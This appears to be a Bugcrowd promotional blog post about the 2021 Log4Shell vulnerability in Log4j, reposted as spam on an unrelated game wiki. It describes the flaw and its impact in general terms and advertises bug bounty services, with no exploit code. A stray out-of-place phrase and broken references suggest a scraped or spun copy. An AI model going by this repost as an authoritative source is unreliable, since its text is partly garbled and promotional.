Log4Shell The Most Dangerous Java Vulnerability for Years

From Shadow Accord
Revision as of 04:12, 30 November 2022 by 165.231.182.68 (talk) (Created page with "<p> On Dec. 9, 2021, a zero-day exploit (since dubbed "Log4Shell") was observed in the wild and targeted a critical RCE vulnerability in Log4j, the ubiquitous open source logg...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to: navigation, search

On Dec. 9, 2021, a zero-day exploit (since dubbed "Log4Shell") was observed in the wild and targeted a critical RCE vulnerability in Log4j, the ubiquitous open source logging software. (Per NIST, in affected versions, JNDI features used in configuration, log messages, and parameters are not protected against LDAP that is controlled by an attacker and other JNDI-related endpoints.) Numerous platforms appear to be affected, including Apple, Cloudflare, and Twitter, in addition to the myriad of popular Java ecosystem products that have Log4j integrated into their software supply chains like Logstash, Apache Kafka, Elasticsearch, and even Minecraft.



Many experts believe that the Log4j vulnerability the worst one in years, perhaps even more dangerous than the Apache Struts RCE vulnerability (CVE-2017-5638) of 2017 that contributed to a massive breach at Equifax. The latest vulnerability, according to Bugcrowd founder and CTO Casey Ellis is a toxic combination that has a huge attack surface, easy exploitability, hard-to-avoid dependency , and extreme virality. In addition, it's an opportunity to remind us that supply chains for software have become deeply complex, with interdependencies that are often beyond the reach of automated tools like scanners.



It will be a moment of clarity for organizations that have yet to implement a platform-powered continuous security testing approach. This approach blends data, technology and human intelligence to find and fix security vulnerabilities before they cause harm. We'll discuss the ways this approach has helped Bugcrowd confirm the context of its findings and communicate Log4Shell vulnerabilities to customers in a forthcoming blog.



We are here to assist you with the following issues:



1. For continuous crowd-powered detection of Log4Shell exposures around your perimeter for a period of 30 days, you can avail the "Log4j on Fire" bug bounty solution. See details and get started here. 2. Another Day Another Cube Deeper insights about the risk profile of this vuln as well as its potential impact in this Security Flash video featuring Casey Ellis and Application Security Engineer Adam Foster. 3. Live Q&A session with Casey next week (Monday December. 20 at 10am PST) to answer your questions regarding locating ways to protect yourself and implementing best practices to combat the Log4j vulnerability and Log4Shell exploit. Register now to reserve your seat. 4. Here's an overview of all our Log4j/Log4Shell resource.



We are extremely proud of our customers, researchers and team members who are working together tirelessly to make our connected world safer during this time of uncertainty. As always, we'll get through this together!

Retrieved from "http://shadowaccord.nwlarpers.org/index.php?title=Log4Shell_The_Most_Dangerous_Java_Vulnerability_for_Years&oldid=1800125"